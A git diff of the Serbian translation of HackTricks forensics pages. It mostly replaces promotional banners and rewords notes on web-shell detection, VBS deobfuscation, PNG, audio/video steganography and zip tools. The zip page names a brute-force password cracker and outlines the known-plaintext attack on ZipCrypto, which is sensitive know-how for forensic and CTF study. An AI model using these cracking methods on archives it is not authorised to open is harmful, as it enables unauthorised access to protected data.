fajlovi u folderu **ne bi trebalo da su menjani**, možete izračunati **heš** **originalnih fajlova** iz foldera i **uporediti** ih sa **trenutnim**. Sve što je izmenjeno biće **sumnjivo**. ### Statistička analiza -Kada se informacije čuvaju u logovima, možete **proveriti statistiku kao koliko puta je svaka datoteka veb servera pristupana jer bi web šel mogao biti jedan od najčešćih**. +Kada se informacije čuvaju u logovima, možete **proveriti statistiku kao što je koliko puta je svaki fajl veb servera pristupan jer bi web ljuska mogla biti jedna od najčešćih**. + +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Podržite HackTricks + +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 41d843f26..ddb861b58 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJATELJE**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} Ovde možete pronaći zanimljive trikove za specifične tipove fajlova i/ili softvere: @@ -37,16 +38,17 @@ Ovde možete pronaći zanimljive trikove za specifične tipove fajlova i/ili sof +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJATELJE**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index aa08b3a50..e160328b7 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a: [**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJEM**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} Neki korisni saveti za debagovanje/deobfuskaciju zlonamernog VBS fajla: @@ -52,16 +53,17 @@ End With End Function ``` +{% hint style="success" %} +Učite i vežbajte AWS hakovanje: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte GCP hakovanje: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJE**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 9be028ca6..61cb42239 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,33 +1,20 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks obuka AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks obuka GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJE**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -**PNG fajlovi** su visoko cenjeni u **CTF izazovima** zbog njihove **bez gubitaka kompresije**, čineći ih idealnim za ugradnju skrivenih podataka. Alati poput **Wireshark-a** omogućavaju analizu PNG fajlova razlaganjem njihovih podataka unutar mrežnih paketa, otkrivajući ugrađene informacije ili anomalije. +**PNG fajlovi** su visoko cenjeni u **CTF izazovima** zbog svoje **bez gubitaka kompresije**, čineći ih idealnim za ugradnju skrivenih podataka. Alati poput **Wireshark** omogućavaju analizu PNG fajlova razlaganjem njihovih podataka unutar mrežnih paketa, otkrivajući ugrađene informacije ili anomalije. -Za proveru integriteta PNG fajlova i popravku oštećenja, **pngcheck** je ključan alat, pružajući funkcionalnost komandne linije za validaciju i dijagnostikovanje PNG fajlova ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Kada fajlovi zahtevaju kompleksnije popravke, online servisi poput [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) pružaju web bazirano rešenje za **popravku oštećenih PNG-ova**, pomažući u oporavku ključnih podataka za učesnike CTF-a. +Za proveru integriteta PNG fajlova i popravku oštećenja, **pngcheck** je ključni alat koji pruža funkcionalnost komandne linije za validaciju i dijagnostikovanje PNG fajlova ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Kada fajlovi zahtevaju kompleksnije popravke, online servisi poput [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) pružaju web bazirano rešenje za **popravku oštećenih PNG-ova**, pomažući u oporavku ključnih podataka za učesnike CTF-a. Ove strategije ističu važnost sveobuhvatnog pristupa u CTF-ovima, koristeći kombinaciju analitičkih alata i tehnika popravke kako bi se otkrili i oporavili skriveni ili izgubljeni podaci. - -
- -Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! - -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJE**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. - -
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index a012a99c9..8e1ec9ac4 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,41 +1,42 @@ +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -**Manipulacija audio i video fajlovima** je osnovna tehnika u **CTF forenzičkim izazovima**, koristeći **steganografiju** i analizu metapodataka za skrivanje ili otkrivanje tajnih poruka. Alati poput **[mediainfo](https://mediaarea.net/en/MediaInfo)** i **`exiftool`** su neophodni za pregled metapodataka fajlova i identifikaciju tipova sadržaja. +**Manipulacija audio i video fajlovima** je osnovna tehnika u **CTF forenzičkim izazovima**, koristeći **steganografiju** i analizu metapodataka za skrivanje ili otkrivanje tajnih poruka. Alati poput **[mediainfo](https://mediaarea.net/en/MediaInfo)** i **`exiftool`** su neophodni za pregledanje metapodataka fajlova i identifikaciju tipova sadržaja. -Za audio izazove, **[Audacity](http://www.audacityteam.org/)** se ističe kao premijeran alat za pregled talasnih oblika i analizu spektrograma, neophodnih za otkrivanje teksta kodiranog u audio formatu. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** se visoko preporučuje za detaljnu analizu spektrograma. **Audacity** omogućava manipulaciju audio zapisa poput usporavanja ili obrtanja traka radi otkrivanja skrivenih poruka. **[Sox](http://sox.sourceforge.net/)**, alat za komandnu liniju, odličan je za konvertovanje i uređivanje audio fajlova. +Za audio izazove, **[Audacity](http://www.audacityteam.org/)** se ističe kao vodeći alat za pregled talasnih oblika i analizu spektrograma, neophodnih za otkrivanje teksta kodiranog u audio formatu. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** se visoko preporučuje za detaljnu analizu spektrograma. **Audacity** omogućava manipulaciju zvuka poput usporavanja ili obrtanja traka radi otkrivanja skrivenih poruka. **[Sox](http://sox.sourceforge.net/)**, alat za komandnu liniju, odličan je za konvertovanje i uređivanje audio fajlova. -**Manipulacija najmanje značajnim bitovima (LSB)** je česta tehnika u audio i video steganografiji, iskorišćavajući fiksne delove medijskih fajlova za skriveno ugrađivanje podataka. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** je koristan za dekodiranje poruka skrivenih kao **DTMF tonovi** ili **Morseov kod**. +**Manipulacija najmanje značajnim bitovima (LSB)** je česta tehnika u audio i video steganografiji, iskorišćavajući fiksne delove fajlova medija za skriveno ugrađivanje podataka. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** je koristan za dekodiranje poruka skrivenih kao **DTMF tonovi** ili **Morseov kod**. -Video izazovi često uključuju kontejnerske formate koji objedinjuju audio i video tokove. **[FFmpeg](http://ffmpeg.org/)** je osnovni alat za analizu i manipulaciju ovih formata, sposoban za demultipleksiranje i reprodukciju sadržaja. Za programere, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integriše mogućnosti FFmpeg-a u Python za napredne skriptabilne interakcije. +Video izazovi često uključuju kontejnerske formate koji pakiraju audio i video tokove. **[FFmpeg](http://ffmpeg.org/)** je osnovni alat za analizu i manipulaciju ovih formata, sposoban za demultipleksiranje i reprodukciju sadržaja. Za programere, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integriše mogućnosti FFmpeg-a u Python za napredne skriptne interakcije. -Ova paleta alata ističe potrebnu fleksibilnost u CTF izazovima, gde učesnici moraju primeniti širok spektar tehnika analize i manipulacije kako bi otkrili skrivene podatke unutar audio i video fajlova. +Ovaj niz alata ističe potrebnu fleksibilnost u CTF izazovima, gde učesnici moraju primeniti širok spektar tehnika analize i manipulacije kako bi otkrili skrivene podatke unutar audio i video fajlova. ## Reference * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) - + +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index 93ebb9b60..7ac2da638 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -1,20 +1,21 @@ # Trikovi sa ZIP fajlovima +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Pomozite HackTricks-u -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -**Alati komandne linije** za upravljanje **zip fajlovima** su esencijalni za dijagnostikovanje, popravku i probijanje zip fajlova. Evo nekih ključnih alata: +**Alati komandne linije** za upravljanje **zip fajlovima** su neophodni za dijagnostikovanje, popravku i probijanje zip fajlova. Evo nekih ključnih alata: - **`unzip`**: Otkriva zašto se zip fajl možda ne može dekompresovati. - **`zipdetails -v`**: Nudi detaljnu analizu polja formata zip fajla. @@ -22,9 +23,24 @@ Drugi načini podrške HackTricks-u: - **`zip -F input.zip --out output.zip`** i **`zip -FF input.zip --out output.zip`**: Pokušajte da popravite oštećene zip fajlove. - **[fcrackzip](https://github.com/hyc/fcrackzip)**: Alat za brute-force probijanje zip šifri, efikasan za šifre do oko 7 karaktera. -Specifikacija [Zip formata fajla](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) pruža sveobuhvatne detalje o strukturi i standardima zip fajlova. +Specifikacija formata zip fajlova pruža sveobuhvatne detalje o strukturi i standardima zip fajlova. -Važno je napomenuti da zip fajlovi zaštićeni šifrom **ne šifruju imena fajlova niti veličine fajlova** unutar sebe, sigurnosni propust koji nije zajednički za RAR ili 7z fajlove koji šifruju ove informacije. Osim toga, zip fajlovi enkriptovani starijom ZipCrypto metodom su ranjivi na **napad sa tekstom u otvorenom obliku** ako je dostupna neenkriptovana kopija kompresovanog fajla. Ovaj napad koristi poznati sadržaj za probijanje šifre zip fajla, ranjivost detaljno opisana u [HackThis-ovom članku](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) i dalje objašnjena u [ovom akademskom radu](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Međutim, zip fajlovi obezbeđeni **AES-256** enkripcijom su imuni na ovaj napad sa tekstom u otvorenom obliku, pokazujući važnost izbora sigurnih metoda enkripcije za osetljive podatke. +Važno je napomenuti da zip fajlovi zaštićeni šifrom **ne šifruju imena fajlova niti veličine fajlova** unutar sebe, što je sigurnosni propust koji nije zajednički za RAR ili 7z fajlove koji šifruju ove informacije. Osim toga, zip fajlovi šifrovani starijom metodom ZipCrypto su ranjivi na **napad sa tekstom u otvorenom obliku** ako je dostupna nešifrovana kopija kompresovanog fajla. Ovaj napad koristi poznati sadržaj za probijanje šifre zip fajla, ranjivost detaljno opisana u [HackThis-ovom članku](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) i dalje objašnjena u [ovom naučnom radu](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Međutim, zip fajlovi obezbeđeni **AES-256** šifrovanjem su imuni na ovaj napad sa tekstom u otvorenom obliku, što pokazuje važnost izbora sigurnih metoda šifrovanja za osetljive podatke. ## Reference -* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) +* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) + +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Pomozite HackTricks-u + +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 7b053e30e..85fb058b3 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -2,26 +2,26 @@ ### Interesantni Windows registarski ključevi +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks obuka AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks obuka GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
